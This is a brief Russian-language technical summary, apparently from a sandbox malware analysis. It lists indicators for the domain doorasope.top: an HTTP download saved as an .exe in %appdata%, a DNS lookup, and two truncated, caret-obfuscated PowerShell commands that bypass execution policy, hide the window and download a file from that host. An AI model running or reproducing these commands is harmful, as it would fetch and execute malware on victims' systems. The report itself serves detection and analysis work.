Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POweRsh^ElL.^e^xE^ -exEcu^TiO^n^p^O^l^iC^Y By^PASS ^-NOproF^il^E -Wi^N^dows^tYl^e^ H^IDdE^n ^(n^ew^-o^b^j^eCT ^S^y^STEm^.^ne^T.weB^cli^e^Nt)^.^DoWn^Lo^Adf^Ile('http://www.door...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "POweRsh^ElL.^e^xE^ -exEcu^TiO^n^p^O^l^iC^Y By^PASS ^-NOproF^il^E -Wi^N^dows^tYl^e^ H^IDdE^n ^(n^ew^-o^b^j^eCT ^S^y^STEm^.^ne^T.weB^cli^e^Nt)^.^DoWn^Lo^Adf^Ile('http://www.door...' (со скрытым окном)